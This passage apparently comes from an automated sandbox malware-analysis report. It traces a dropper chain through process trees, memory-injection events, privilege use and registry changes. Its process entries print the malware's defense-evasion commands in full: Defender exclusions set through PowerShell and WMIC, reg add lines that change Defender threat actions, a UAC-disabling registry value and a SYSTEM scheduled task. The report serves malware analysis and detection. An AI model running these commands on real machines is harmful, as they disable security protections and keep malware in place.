Token: SeCreatePagefilePrivilege	4860	chrome.exe
Token: SeDebugPrivilege	5740	jsc.exe
Token: SeDebugPrivilege	5728	powershell.exe
Token: SeShutdownPrivilege	4860	chrome.exe
Token: SeCreatePagefilePrivilege	4860	chrome.exe
Token: SeShutdownPrivilege	4860	chrome.exe
Token: SeCreatePagefilePrivilege	4860	chrome.exe
Token: SeShutdownPrivilege	4860	chrome.exe
Token: SeCreatePagefilePrivilege	4860	chrome.exe
Token: SeShutdownPrivilege	4860	chrome.exe
Token: SeCreatePagefilePrivilege	4860	chrome.exe
Token: SeShutdownPrivilege	4860	chrome.exe
Token: SeCreatePagefilePrivilege	4860	chrome.exe
Token: SeDebugPrivilege	5544	trf.exe
Token: SeShutdownPrivilege	4860	chrome.exe
Token: SeCreatePagefilePrivilege	4860	chrome.exe
Token: SeShutdownPrivilege	4860	chrome.exe
Token: SeCreatePagefilePrivilege	4860	chrome.exe
Token: SeShutdownPrivilege	4860	chrome.exe
Token: SeCreatePagefilePrivilege	4860	chrome.exe
Token: SeDebugPrivilege	1624	powershell.exe
Token: SeShutdownPrivilege	4860	chrome.exe
Token: SeCreatePagefilePrivilege	4860	chrome.exe
Token: SeDebugPrivilege	2084	jok.exe
Token: SeShutdownPrivilege	4860	chrome.exe
Token: SeCreatePagefilePrivilege	4860	chrome.exe
Token: SeShutdownPrivilege	4860	chrome.exe
Token: SeCreatePagefilePrivilege	4860	chrome.exe
Token: SeShutdownPrivilege	4860	chrome.exe
Token: SeCreatePagefilePrivilege	4860	chrome.exe
Token: SeShutdownPrivilege	4860	chrome.exe
Token: SeCreatePagefilePrivilege	4860	chrome.exe
Token: SeShutdownPrivilege	4860	chrome.exe
Token: SeCreatePagefilePrivilege	4860	chrome.exe
Token: SeDebugPrivilege	5540	keks.exe
Token: SeDebugPrivilege	6904	powershell.exe
Token: SeDebugPrivilege	10172	powershell.exe
Token: SeIncreaseQuotaPrivilege	7936	WMIC.exe
Token: SeSecurityPrivilege	7936	WMIC.exe
Token: SeTakeOwnershipPrivilege	7936	WMIC.exe
Token: SeLoadDriverPrivilege	7936	WMIC.exe
Token: SeSystemProfilePrivilege	7936	WMIC.exe
Token: SeSystemtimePrivilege	7936	WMIC.exe
Token: SeProfSingleProcessPrivilege	7936	WMIC.exe
Token: SeIncBasePriorityPrivilege	7936	WMIC.exe
Token: SeCreatePagefilePrivilege	7936	WMIC.exe
Token: SeBackupPrivilege	7936	WMIC.exe
Token: SeRestorePrivilege	7936	WMIC.exe
Token: SeShutdownPrivilege	7936	WMIC.exe
Token: SeDebugPrivilege	7936	WMIC.exe
Token: SeSystemEnvironmentPrivilege	7936	WMIC.exe
Token: SeRemoteShutdownPrivilege	7936	WMIC.exe
Token: SeUndockPrivilege	7936	WMIC.exe
Token: SeManageVolumePrivilege	7936	WMIC.exe
Token: 33	7936	WMIC.exe
Token: 34	7936	WMIC.exe
Token: 35	7936	WMIC.exe
Token: 36	7936	WMIC.exe
Token: SeIncreaseQuotaPrivilege	7936	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2848	b6ebe28937.exe
2848	b6ebe28937.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
2848	b6ebe28937.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
2848	b6ebe28937.exe
4860	chrome.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
9560	C8zbImAnLOG7qFppQxLC.exe
9560	C8zbImAnLOG7qFppQxLC.exe
9560	C8zbImAnLOG7qFppQxLC.exe
9560	C8zbImAnLOG7qFppQxLC.exe
9560	C8zbImAnLOG7qFppQxLC.exe
8320	msedge.exe
8320	msedge.exe
8320	msedge.exe
8320	msedge.exe
8320	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2848	b6ebe28937.exe
2848	b6ebe28937.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
2848	b6ebe28937.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
4860	chrome.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
2848	b6ebe28937.exe
9560	C8zbImAnLOG7qFppQxLC.exe
9560	C8zbImAnLOG7qFppQxLC.exe
9560	C8zbImAnLOG7qFppQxLC.exe
9560	C8zbImAnLOG7qFppQxLC.exe
9560	C8zbImAnLOG7qFppQxLC.exe
8320	msedge.exe
8320	msedge.exe
8320	msedge.exe
8320	msedge.exe
8320	msedge.exe
8320	msedge.exe
8320	msedge.exe
8320	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1300 wrote to memory of 1952	1300	65b13c88ba108bc85331d8fd4c92b5f84d48e63f612085a73eaec353f821ccc3.exe	87
PID 1300 wrote to memory of 1952	1300	65b13c88ba108bc85331d8fd4c92b5f84d48e63f612085a73eaec353f821ccc3.exe	87
PID 1300 wrote to memory of 1952	1300	65b13c88ba108bc85331d8fd4c92b5f84d48e63f612085a73eaec353f821ccc3.exe	87
PID 1952 wrote to memory of 392	1952	explorta.exe	96
PID 1952 wrote to memory of 392	1952	explorta.exe	96
PID 1952 wrote to memory of 392	1952	explorta.exe	96
PID 1952 wrote to memory of 3044	1952	explorta.exe	97
PID 1952 wrote to memory of 3044	1952	explorta.exe	97
PID 1952 wrote to memory of 3044	1952	explorta.exe	97
PID 3044 wrote to memory of 4852	3044	amert.exe	100
PID 3044 wrote to memory of 4852	3044	amert.exe	100
PID 3044 wrote to memory of 4852	3044	amert.exe	100
PID 1952 wrote to memory of 2856	1952	explorta.exe	101
PID 1952 wrote to memory of 2856	1952	explorta.exe	101
PID 1952 wrote to memory of 2856	1952	explorta.exe	101
PID 1952 wrote to memory of 2848	1952	explorta.exe	102
PID 1952 wrote to memory of 2848	1952	explorta.exe	102
PID 1952 wrote to memory of 2848	1952	explorta.exe	102
PID 4852 wrote to memory of 2600	4852	explorha.exe	103
PID 4852 wrote to memory of 2600	4852	explorha.exe	103
PID 4852 wrote to memory of 2600	4852	explorha.exe	103
PID 2848 wrote to memory of 4860	2848	b6ebe28937.exe	105
PID 2848 wrote to memory of 4860	2848	b6ebe28937.exe	105
PID 4860 wrote to memory of 4612	4860	chrome.exe	107
PID 4860 wrote to memory of 4612	4860	chrome.exe	107
PID 2600 wrote to memory of 2836	2600	swiiiii.exe	108
PID 2600 wrote to memory of 2836	2600	swiiiii.exe	108
PID 2600 wrote to memory of 2836	2600	swiiiii.exe	108
PID 2600 wrote to memory of 2836	2600	swiiiii.exe	108
PID 2600 wrote to memory of 2836	2600	swiiiii.exe	108
PID 2600 wrote to memory of 2836	2600	swiiiii.exe	108
PID 2600 wrote to memory of 2836	2600	swiiiii.exe	108
PID 2600 wrote to memory of 2836	2600	swiiiii.exe	108
PID 2600 wrote to memory of 2836	2600	swiiiii.exe	108
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111
PID 4860 wrote to memory of 4316	4860	chrome.exe	111

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	ZEVaqp48Gz7MK9efLNaIrhhw.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	ZEVaqp48Gz7MK9efLNaIrhhw.exe

C:\Users\Admin\AppData\Local\Temp\65b13c88ba108bc85331d8fd4c92b5f84d48e63f612085a73eaec353f821ccc3.exe
"C:\Users\Admin\AppData\Local\Temp\65b13c88ba108bc85331d8fd4c92b5f84d48e63f612085a73eaec353f821ccc3.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1300
- C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
  "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1952
- - C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
    "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
    3⤵
    PID:392
- - C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe
    "C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:3044
  - - C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
      "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4852
    - - C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2600
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:2836
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2600 -s 880
        6⤵
        Program crash
        
        PID:4668
    - - C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe"
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2084
    - - C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5236
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:5404
    - - C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe"
        5⤵
        UAC bypass
        Windows security bypass
        Checks computer location settings
        Executes dropped EXE
        Windows security modification
        Checks whether UAC is enabled
        Suspicious use of SetThreadContext
        System policy modification
        
        PID:5640
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe" -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5728
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
        6⤵
        Drops startup file
        Suspicious use of AdjustPrivilegeToken
        
        PID:5740
        
        C:\Users\Admin\Pictures\fKdFV5AmVd326gdNS53V2mA3.exe
        
        "C:\Users\Admin\Pictures\fKdFV5AmVd326gdNS53V2mA3.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3468
        
        C:\Users\Admin\AppData\Local\Temp\u2oc.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u2oc.0.exe"
        8⤵
        Executes dropped EXE
        
        PID:10320
        
        C:\Users\Admin\AppData\Local\Temp\u2oc.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u2oc.1.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Checks SCSI registry key(s)
        
        PID:1648
        
        C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        9⤵
        
        PID:5960
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3468 -s 820
        8⤵
        Program crash
        
        PID:8268
        
        C:\Users\Admin\Pictures\yHfUkp6PWcTgkIP6cYyXvQeL.exe
        
        "C:\Users\Admin\Pictures\yHfUkp6PWcTgkIP6cYyXvQeL.exe"
        7⤵
        Executes dropped EXE
        
        PID:5436
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:12104
        
        C:\Users\Admin\Pictures\yHfUkp6PWcTgkIP6cYyXvQeL.exe
        
        "C:\Users\Admin\Pictures\yHfUkp6PWcTgkIP6cYyXvQeL.exe"
        8⤵
        
        PID:8480
        
        C:\Users\Admin\Pictures\FTtkwo0yyztEYF10Ymp8Jzza.exe
        
        "C:\Users\Admin\Pictures\FTtkwo0yyztEYF10Ymp8Jzza.exe"
        7⤵
        Executes dropped EXE
        
        PID:4440
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8740
        
        C:\Users\Admin\Pictures\FTtkwo0yyztEYF10Ymp8Jzza.exe
        
        "C:\Users\Admin\Pictures\FTtkwo0yyztEYF10Ymp8Jzza.exe"
        8⤵
        Executes dropped EXE
        
        PID:1064
        
        C:\Users\Admin\Pictures\0rfEKA6TP1pzD2uz8e2yYJlL.exe
        
        "C:\Users\Admin\Pictures\0rfEKA6TP1pzD2uz8e2yYJlL.exe"
        7⤵
        Executes dropped EXE
        
        PID:5892
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:11000
        
        C:\Users\Admin\Pictures\0rfEKA6TP1pzD2uz8e2yYJlL.exe
        
        "C:\Users\Admin\Pictures\0rfEKA6TP1pzD2uz8e2yYJlL.exe"
        8⤵
        
        PID:8848
        
        C:\Users\Admin\Pictures\YZbUxHj1De2oiPxWkxf1KPqO.exe
        
        "C:\Users\Admin\Pictures\YZbUxHj1De2oiPxWkxf1KPqO.exe"
        7⤵
        Executes dropped EXE
        
        PID:5924
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8916
        
        C:\Users\Admin\Pictures\YZbUxHj1De2oiPxWkxf1KPqO.exe
        
        "C:\Users\Admin\Pictures\YZbUxHj1De2oiPxWkxf1KPqO.exe"
        8⤵
        
        PID:8608
        
        C:\Users\Admin\Pictures\4iGAcZ9y5M3XYvGSxSeOp8ig.exe
        
        "C:\Users\Admin\Pictures\4iGAcZ9y5M3XYvGSxSeOp8ig.exe"
        7⤵
        Modifies firewall policy service
        Windows security bypass
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Windows security modification
        Checks whether UAC is enabled
        Drops file in System32 directory
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5168
        
        C:\Users\Admin\Documents\SimpleAdobe\ZEVaqp48Gz7MK9efLNaIrhhw.exe
        
        C:\Users\Admin\Documents\SimpleAdobe\ZEVaqp48Gz7MK9efLNaIrhhw.exe
        8⤵
        Executes dropped EXE
        Accesses Microsoft Outlook profiles
        Checks processor information in registry
        outlook_office_path
        outlook_win_path
        
        PID:5084
        
        C:\Users\Admin\Pictures\mLAQ7VMAKuHccMvm4tGFe9CX.exe
        
        "C:\Users\Admin\Pictures\mLAQ7VMAKuHccMvm4tGFe9CX.exe"
        7⤵
        Executes dropped EXE
        
        PID:5708
        
        C:\Users\Admin\AppData\Local\Temp\7zSB74A.tmp\Install.exe
        
        .\Install.exe /ThYFdiduvbI "385118" /S
        8⤵
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:1036
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:6348
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        10⤵
        
        PID:6540
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        11⤵
        
        PID:6556
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:6568
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        10⤵
        
        PID:6600
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        11⤵
        
        PID:6620
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:6672
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        10⤵
        
        PID:6720
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        11⤵
        
        PID:6732
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:6748
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        10⤵
        
        PID:6764
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        11⤵
        
        PID:6776
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:6792
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:6856
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        11⤵
        
        PID:6876
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:6904
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        13⤵
        
        PID:10232
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        9⤵
        
        PID:9968
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:10104
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:10172
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7936
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 15:54:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSB74A.tmp\Install.exe\" it /GpSdidzXAM 385118 /S" /V1 /F
        9⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:10160
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        9⤵
        
        PID:9712
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        10⤵
        
        PID:8804
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        11⤵
        
        PID:7936
        
        C:\Users\Admin\Pictures\ucsXcgnqOZBYk5HGbPuDy3Ac.exe
        
        "C:\Users\Admin\Pictures\ucsXcgnqOZBYk5HGbPuDy3Ac.exe"
        7⤵
        Executes dropped EXE
        
        PID:10020
        
        C:\Users\Admin\AppData\Local\Temp\7zSDE69.tmp\Install.exe
        
        .\Install.exe /ThYFdiduvbI "385118" /S
        8⤵
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:9888
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:9776
        
        C:\Windows\SysWOW64\forfiles.exe
        
